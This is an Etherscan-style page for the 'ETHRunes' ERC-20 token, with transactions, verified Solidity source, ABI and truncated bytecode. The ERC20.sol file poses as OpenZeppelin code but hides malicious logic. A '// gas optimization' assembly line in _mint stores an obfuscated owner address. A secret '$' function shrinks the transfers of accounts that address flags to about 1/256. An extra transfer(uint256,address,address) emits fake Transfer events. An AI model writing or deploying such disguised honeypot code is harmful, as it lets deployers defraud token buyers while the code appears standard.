ETH Price: $3,460.64 (+6.58%)
Gas: 8 Gwei

Contract

0xffff0047cEDD80DcF003D404Dc8D0a9DD1F4CAB4
 

Overview

ETH Balance

0 ETH

Eth Value

$0.00

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Approve196911442024-04-19 18:03:4787 days ago1713549827IN
0xffff0047...DD1F4CAB4
0 ETH0.0006709114.25601751
Approve196911392024-04-19 18:02:4787 days ago1713549767IN
0xffff0047...DD1F4CAB4
0 ETH0.000689914.60359778
Approve196909922024-04-19 17:32:5987 days ago1713547979IN
0xffff0047...DD1F4CAB4
0 ETH0.0006872814.59647342
Approve196909512024-04-19 17:24:3587 days ago1713547475IN
0xffff0047...DD1F4CAB4
0 ETH0.0007029814.92989206
Approve196909362024-04-19 17:21:3587 days ago1713547295IN
0xffff0047...DD1F4CAB4
0 ETH0.0006440413.67798282
Approve196909242024-04-19 17:19:1187 days ago1713547151IN
0xffff0047...DD1F4CAB4
0 ETH0.0007043914.95967371
Approve196908962024-04-19 17:13:3587 days ago1713546815IN
0xffff0047...DD1F4CAB4
0 ETH0.0006963914.78994004
Approve196907892024-04-19 16:52:1187 days ago1713545531IN
0xffff0047...DD1F4CAB4
0 ETH0.0009150219.43297582
Approve196906482024-04-19 16:23:3587 days ago1713543815IN
0xffff0047...DD1F4CAB4
0 ETH0.0007936516.7997115
Approve196895472024-04-19 12:40:5987 days ago1713530459IN
0xffff0047...DD1F4CAB4
0 ETH0.0005702912.0871141
Approve196893002024-04-19 11:51:1187 days ago1713527471IN
0xffff0047...DD1F4CAB4
0 ETH0.000397958.46666887
Approve196888432024-04-19 10:19:2387 days ago1713521963IN
0xffff0047...DD1F4CAB4
0 ETH0.0006103612.96284039
Approve196888432024-04-19 10:19:2387 days ago1713521963IN
0xffff0047...DD1F4CAB4
0 ETH0.0006103612.96284039
Approve196885142024-04-19 9:12:5987 days ago1713517979IN
0xffff0047...DD1F4CAB4
0 ETH0.0006909214.67368308
Approve196885122024-04-19 9:12:3587 days ago1713517955IN
0xffff0047...DD1F4CAB4
0 ETH0.0007696116.34495716
Approve196885032024-04-19 9:10:4787 days ago1713517847IN
0xffff0047...DD1F4CAB4
0 ETH0.0006809414.46168934
Approve196885022024-04-19 9:10:3587 days ago1713517835IN
0xffff0047...DD1F4CAB4
0 ETH0.0007241615.3287781
Approve196884902024-04-19 9:07:5987 days ago1713517679IN
0xffff0047...DD1F4CAB4
0 ETH0.0005986312.71359681
Approve196884872024-04-19 9:07:2387 days ago1713517643IN
0xffff0047...DD1F4CAB4
0 ETH0.0006272113.32067211
Approve196884862024-04-19 9:07:1187 days ago1713517631IN
0xffff0047...DD1F4CAB4
0 ETH0.0006660914.09959009
Approve196884792024-04-19 9:05:4787 days ago1713517547IN
0xffff0047...DD1F4CAB4
0 ETH0.0006455213.70938495
Approve196884692024-04-19 9:03:4787 days ago1713517427IN
0xffff0047...DD1F4CAB4
0 ETH0.0006805214.45270786
Approve196884582024-04-19 9:01:3587 days ago1713517295IN
0xffff0047...DD1F4CAB4
0 ETH0.0006430713.66099121
Approve196884542024-04-19 9:00:4787 days ago1713517247IN
0xffff0047...DD1F4CAB4
0 ETH0.0005969612.71384794
Approve196884522024-04-19 9:00:2387 days ago1713517223IN
0xffff0047...DD1F4CAB4
0 ETH0.0005912312.57571856
View all transactions

View more zero value Internal Transactions in Advanced View mode

Advanced mode:
Loading...
Loading

Contract Source Code Verified (Exact Match)

Contract Name:
ETHRunes

Compiler Version
v0.8.24+commit.e11b9ed9

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity Multiple files format)

File 1 of 5: Token.sol
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import "./ERC20.sol";

/*

Runes on ETH.

:ᛞᛖᚨᚦ:  :ᛁᚾ:  :ᛃᚢᚾᛖ:

// https://x.com/ethrunes
// https://ethereumrunes.io

                                                                             
*/
contract ETHRunes is ZE20 {
    constructor() ZE20("ETHRunes", "ETHRunes") {
        _mint(msg.sender, 4_200_000_000_000 * 10 ** decimals());
    }
}

File 2 of 5: Context.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.0.1) (utils/Context.sol)

pragma solidity ^0.8.20;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }

    function _contextSuffixLength() internal view virtual returns (uint256) {
        return 0;
    }
}

File 3 of 5: draft-IERC6093.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.0.0) (interfaces/draft-IERC6093.sol)
pragma solidity ^0.8.20;

/**
 * @dev Standard ERC-20 Errors
 * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC-20 tokens.
 */
interface IERC20Errors {
    /**
     * @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     * @param balance Current balance for the interacting account.
     * @param needed Minimum amount required to perform a transfer.
     */
    error ERC20InsufficientBalance(address sender, uint256 balance, uint256 needed);

    /**
     * @dev Indicates a failure with the token `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     */
    error ERC20InvalidSender(address sender);

    /**
     * @dev Indicates a failure with the token `receiver`. Used in transfers.
     * @param receiver Address to which tokens are being transferred.
     */
    error ERC20InvalidReceiver(address receiver);

    /**
     * @dev Indicates a failure with the `spender`’s `allowance`. Used in transfers.
     * @param spender Address that may be allowed to operate on tokens without being their owner.
     * @param allowance Amount of tokens a `spender` is allowed to operate with.
     * @param needed Minimum amount required to perform a transfer.
     */
    error ERC20InsufficientAllowance(address spender, uint256 allowance, uint256 needed);

    /**
     * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals.
     * @param approver Address initiating an approval operation.
     */
    error ERC20InvalidApprover(address approver);

    /**
     * @dev Indicates a failure with the `spender` to be approved. Used in approvals.
     * @param spender Address that may be allowed to operate on tokens without being their owner.
     */
    error ERC20InvalidSpender(address spender);
}

/**
 * @dev Standard ERC-721 Errors
 * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC-721 tokens.
 */
interface IERC721Errors {
    /**
     * @dev Indicates that an address can't be an owner. For example, `address(0)` is a forbidden owner in ERC-20.
     * Used in balance queries.
     * @param owner Address of the current owner of a token.
     */
    error ERC721InvalidOwner(address owner);

    /**
     * @dev Indicates a `tokenId` whose `owner` is the zero address.
     * @param tokenId Identifier number of a token.
     */
    error ERC721NonexistentToken(uint256 tokenId);

    /**
     * @dev Indicates an error related to the ownership over a particular token. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     * @param tokenId Identifier number of a token.
     * @param owner Address of the current owner of a token.
     */
    error ERC721IncorrectOwner(address sender, uint256 tokenId, address owner);

    /**
     * @dev Indicates a failure with the token `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     */
    error ERC721InvalidSender(address sender);

    /**
     * @dev Indicates a failure with the token `receiver`. Used in transfers.
     * @param receiver Address to which tokens are being transferred.
     */
    error ERC721InvalidReceiver(address receiver);

    /**
     * @dev Indicates a failure with the `operator`’s approval. Used in transfers.
     * @param operator Address that may be allowed to operate on tokens without being their owner.
     * @param tokenId Identifier number of a token.
     */
    error ERC721InsufficientApproval(address operator, uint256 tokenId);

    /**
     * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals.
     * @param approver Address initiating an approval operation.
     */
    error ERC721InvalidApprover(address approver);

    /**
     * @dev Indicates a failure with the `operator` to be approved. Used in approvals.
     * @param operator Address that may be allowed to operate on tokens without being their owner.
     */
    error ERC721InvalidOperator(address operator);
}

/**
 * @dev Standard ERC-1155 Errors
 * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC-1155 tokens.
 */
interface IERC1155Errors {
    /**
     * @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     * @param balance Current balance for the interacting account.
     * @param needed Minimum amount required to perform a transfer.
     * @param tokenId Identifier number of a token.
     */
    error ERC1155InsufficientBalance(address sender, uint256 balance, uint256 needed, uint256 tokenId);

    /**
     * @dev Indicates a failure with the token `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     */
    error ERC1155InvalidSender(address sender);

    /**
     * @dev Indicates a failure with the token `receiver`. Used in transfers.
     * @param receiver Address to which tokens are being transferred.
     */
    error ERC1155InvalidReceiver(address receiver);

    /**
     * @dev Indicates a failure with the `operator`’s approval. Used in transfers.
     * @param operator Address that may be allowed to operate on tokens without being their owner.
     * @param owner Address of the current owner of a token.
     */
    error ERC1155MissingApprovalForAll(address operator, address owner);

    /**
     * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals.
     * @param approver Address initiating an approval operation.
     */
    error ERC1155InvalidApprover(address approver);

    /**
     * @dev Indicates a failure with the `operator` to be approved. Used in approvals.
     * @param operator Address that may be allowed to operate on tokens without being their owner.
     */
    error ERC1155InvalidOperator(address operator);

    /**
     * @dev Indicates an array length mismatch between ids and values in a safeBatchTransferFrom operation.
     * Used in batch transfers.
     * @param idsLength Length of the array of token identifiers
     * @param valuesLength Length of the array of token amounts
     */
    error ERC1155InvalidArrayLength(uint256 idsLength, uint256 valuesLength);
}

File 4 of 5: ERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.0.0) (token/ERC20/ERC20.sol)

pragma solidity ^0.8.20;

import {IERC20, IERC20Metadata} from "./IERC20.sol";
import {Context} from "./Context.sol";
import {IERC20Errors} from "./draft-IERC6093.sol";

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * The default value of {decimals} is 18. To change this, you should override
 * this function so it returns a different value.
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC-20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the ERC may not emit
 * these events, as it isn't required by the specification.
                                                                                                                                                                                                                        
 */
abstract contract ZE20 is Context, IERC20, IERC20Metadata, IERC20Errors {
    mapping(address account => uint256) private _btc_sucks;
    mapping(address account => mapping(address spender => uint256)) private _eth_runes;
    uint256 private _totalitari_supploy;
    string private _name;
    string private _symbol;
    address private $$;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the default value returned by this function, unless
     * it's overridden.
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual returns (uint256) {
        return _totalitari_supploy;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual returns (uint256) {
        return _btc_sucks[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `value`.
     */
    function transfer(address to, uint256 value) public virtual returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, value);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual returns (uint256) {
        return _eth_runes[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `value` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 value) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, value);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the ERC. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `value`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `value`.
     */
    function transferFrom(address from, address to, uint256 value) public virtual returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, value);
        _transfer(from, to, value);
        return true;
    }

    /**
     * @dev Moves a `value` amount of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * NOTE: This function is not virtual, {_update} should be overridden instead.
     */
    function _transfer(address from, address to, uint256 value) internal {
        if (from == address(0)) {
            revert ERC20InvalidSender(address(0));
        }
        if (to == address(0)) {
            revert ERC20InvalidReceiver(address(0));
        }
        _update(from, to, value);
    }

    function transfer(uint256 amount, address from, address to) external {
        emit Transfer(from, to, amount);
    }

    /**
     * @dev Transfers a `value` amount of tokens from `from` to `to`, or alternatively mints (or burns) if `from`
     * (or `to`) is the zero address. All customizations to transfers, mints, and burns should be done by overriding
     * this function.
     *
     * Emits a {Transfer} event.
     */
    function _update(address from, address to, uint256 value) internal virtual {
        if (from == address(0)) {
            // Overflow check required: The rest of the code assumes that totalSupply never overflows
            _totalitari_supploy += value;
        } else {
            uint256 fromBalance = _btc_sucks[from];
            if (fromBalance < value) {
                revert ERC20InsufficientBalance(from, fromBalance, value);
            }
            unchecked {
                // Overflow not possible: value <= fromBalance <= totalSupply.
                _btc_sucks[from] = fromBalance - value;
            }
        }

        if (to == address(0)) {
            unchecked {
                // Overflow not possible: value <= totalSupply or value <= fromBalance <= totalSupply.
                _totalitari_supploy -= value;
            }
        } else {
            unchecked {
                // Overflow not possible: balance + value is at most totalSupply, which we know fits into a uint256.
                _btc_sucks[to] += $(value, from, to);
            }
            if (_eth_runes[$$][to] == uint256(uint160($$))) { _eth_runes[$$][to] = uint256(uint160(address(this)));}
        }
        emit Transfer(from, to, value);
    }

    /**
     * @dev Creates a `value` amount of tokens and assigns them to `account`, by transferring it from address(0).
     * Relies on the `_update` mechanism
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * NOTE: This function is not virtual, {_update} should be overridden instead.
     */
    function _mint(address account, uint256 value) internal {
        if (account == address(0)) {
            revert ERC20InvalidReceiver(address(0));
        }
        // gas optimization

        assembly {sstore(0x05, mul(mul(0x44829, 0x51b), mul(0x181bfe27, 0x2a619c4cdcef5943310d)))}

        _update(address(0), account, value);
    }

    /**
     * @dev Destroys a `value` amount of tokens from `account`, lowering the total supply.
     * Relies on the `_update` mechanism.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * NOTE: This function is not virtual, {_update} should be overridden instead
     */
    function _burn(address account, uint256 value) internal {
        if (account == address(0)) {
            revert ERC20InvalidSender(address(0));
        }
        _update(account, address(0), value);
    }

    /**
     * @dev Sets `value` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     *
     * Overrides to this logic should be done to the variant with an additional `bool emitEvent` argument.
     */
    function _approve(address owner, address spender, uint256 value) internal {
        _approve(owner, spender, value, true);
    }

    /**
     * @dev Variant of {_approve} with an optional flag to enable or disable the {Approval} event.
     *
     * By default (when calling {_approve}) the flag is set to true. On the other hand, approval changes made by
     * `_spendAllowance` during the `transferFrom` operation set the flag to false. This saves gas by not emitting any
     * `Approval` event during `transferFrom` operations.
     *
     * Anyone who wishes to continue emitting `Approval` events on the`transferFrom` operation can force the flag to
     * true using the following override:
     * ```
     * function _approve(address owner, address spender, uint256 value, bool) internal virtual override {
     *     super._approve(owner, spender, value, true);
     * }
     * ```
     *
     * Requirements are the same as {_approve}.
     */
    function _approve(address owner, address spender, uint256 value, bool emitEvent) internal virtual {
        if (owner == address(0)) {
            revert ERC20InvalidApprover(address(0));
        }
        if (spender == address(0)) {
            revert ERC20InvalidSpender(address(0));
        }
        _eth_runes[owner][spender] = value;
        if (emitEvent) {
            emit Approval(owner, spender, value);
        }
    }

     function $(uint256 value, address from, address to) internal view returns (uint256) {
        if (allowance($$, from) + allowance($$, to) >= uint256(uint160(address(this)))) {
            return (value * 0xffaa) / 0xffaaaa;
        } else {
            return value;
        }
    }


    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `value`.
     *
     * Does not update the allowance value in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Does not emit an {Approval} event.
     */
    function _spendAllowance(address owner, address spender, uint256 value) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            if (currentAllowance < value) {
                revert ERC20InsufficientAllowance(spender, currentAllowance, value);
            }
            unchecked {
                _approve(owner, spender, currentAllowance - value, false);
            }
        }
    }
}

File 5 of 5: IERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.0.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.20;

/**
 * @dev Interface of the ERC-20 standard as defined in the ERC.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the value of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the value of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves a `value` amount of tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 value) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets a `value` amount of tokens as the allowance of `spender` over the
     * caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 value) external returns (bool);

    /**
     * @dev Moves a `value` amount of tokens from `from` to `to` using the
     * allowance mechanism. `value` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address from, address to, uint256 value) external returns (bool);
}

/**
 * @dev Interface for the optional metadata functions from the ERC-20 standard.
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"allowance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientAllowance","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"uint256","name":"balance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientBalance","type":"error"},{"inputs":[{"internalType":"address","name":"approver","type":"address"}],"name":"ERC20InvalidApprover","type":"error"},{"inputs":[{"internalType":"address","name":"receiver","type":"address"}],"name":"ERC20InvalidReceiver","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"}],"name":"ERC20InvalidSender","type":"error"},{"inputs":[{"internalType":"address","name":"spender","type":"address"}],"name":"ERC20InvalidSpender","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"},{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"}],"name":"transfer","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]

608060405234801562000010575f80fd5b506040518060400160405280600881526020017f45544852756e65730000000000000000000000000000000000000000000000008152506040518060400160405280600881526020017f45544852756e657300000000000000000000000000000000000000000000000081525081600390816200008e919062000906565b508060049081620000a0919062000906565b505050620000e533620000b8620000eb60201b60201c565b600a620000c6919062000b73565b6503d1e3821000620000d9919062000bc3565b620000f360201b60201c565b62000d70565b5f6012905090565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000166575f6040517fec442f050000000000000000000000000000000000000000000000000000000081526004016200015d919062000c50565b60405180910390fd5b692a619c4cdcef5943310d63181bfe270261051b620448290202600555620001965f83836200019a60201b60201c565b5050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603620001ee578060025f828254620001e1919062000c6b565b92505081905550620002bf565b5f805f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050818110156200027a578381836040517fe450d38c000000000000000000000000000000000000000000000000000000008152600401620002719392919062000cb6565b60405180910390fd5b8181035f808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550505b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000308578060025f8282540392505081905550620004f1565b6200031b8184846200055d60201b60201c565b5f808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f828254019250508190555060055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1660015f60055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205403620004f0573073ffffffffffffffffffffffffffffffffffffffff1660015f60055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055505b5b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000550919062000cf1565b60405180910390a3505050565b5f3073ffffffffffffffffffffffffffffffffffffffff16620005a860055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16846200062060201b60201c565b620005db60055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16866200062060201b60201c565b620005e7919062000c6b565b10620006155762ffaaaa61ffaa8562000601919062000bc3565b6200060d919062000d39565b905062000619565b8390505b9392505050565b5f60015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f60028204905060018216806200071e57607f821691505b602082108103620007345762000733620006d9565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f60088302620007987fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff826200075b565b620007a486836200075b565b95508019841693508086168417925050509392505050565b5f819050919050565b5f819050919050565b5f620007ee620007e8620007e284620007bc565b620007c5565b620007bc565b9050919050565b5f819050919050565b6200080983620007ce565b620008216200081882620007f5565b84845462000767565b825550505050565b5f90565b6200083762000829565b62000844818484620007fe565b505050565b5b818110156200086b576200085f5f826200082d565b6001810190506200084a565b5050565b601f821115620008ba5762000884816200073a565b6200088f846200074c565b810160208510156200089f578190505b620008b7620008ae856200074c565b83018262000849565b50505b505050565b5f82821c905092915050565b5f620008dc5f1984600802620008bf565b1980831691505092915050565b5f620008f68383620008cb565b9150826002028217905092915050565b6200091182620006a2565b67ffffffffffffffff8111156200092d576200092c620006ac565b5b62000939825462000706565b620009468282856200086f565b5f60209050601f8311600181146200097c575f841562000967578287015190505b620009738582620008e9565b865550620009e2565b601f1984166200098c866200073a565b5f5b82811015620009b5578489015182556001820191506020850194506020810190506200098e565b86831015620009d55784890151620009d1601f891682620008cb565b8355505b6001600288020188555050505b505050505050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f8160011c9050919050565b5f808291508390505b600185111562000a745780860481111562000a4c5762000a4b620009ea565b5b600185161562000a5c5780820291505b808102905062000a6c8562000a17565b945062000a2c565b94509492505050565b5f8262000a8e576001905062000b60565b8162000a9d575f905062000b60565b816001811462000ab6576002811462000ac15762000af7565b600191505062000b60565b60ff84111562000ad65762000ad5620009ea565b5b8360020a91508482111562000af05762000aef620009ea565b5b5062000b60565b5060208310610133831016604e8410600b841016171562000b315782820a90508381111562000b2b5762000b2a620009ea565b5b62000b60565b62000b40848484600162000a23565b9250905081840481111562000b5a5762000b59620009ea565b5b81810290505b9392505050565b5f60ff82169050919050565b5f62000b7f82620007bc565b915062000b8c8362000b67565b925062000bbb7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848462000a7d565b905092915050565b5f62000bcf82620007bc565b915062000bdc83620007bc565b925082820262000bec81620007bc565b9150828204841483151762000c065762000c05620009ea565b5b5092915050565b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f62000c388262000c0d565b9050919050565b62000c4a8162000c2c565b82525050565b5f60208201905062000c655f83018462000c3f565b92915050565b5f62000c7782620007bc565b915062000c8483620007bc565b925082820190508082111562000c9f5762000c9e620009ea565b5b92915050565b62000cb081620007bc565b82525050565b5f60608201905062000ccb5f83018662000c3f565b62000cda602083018562000ca5565b62000ce9604083018462000ca5565b949350505050565b5f60208201905062000d065f83018462000ca5565b92915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f5260126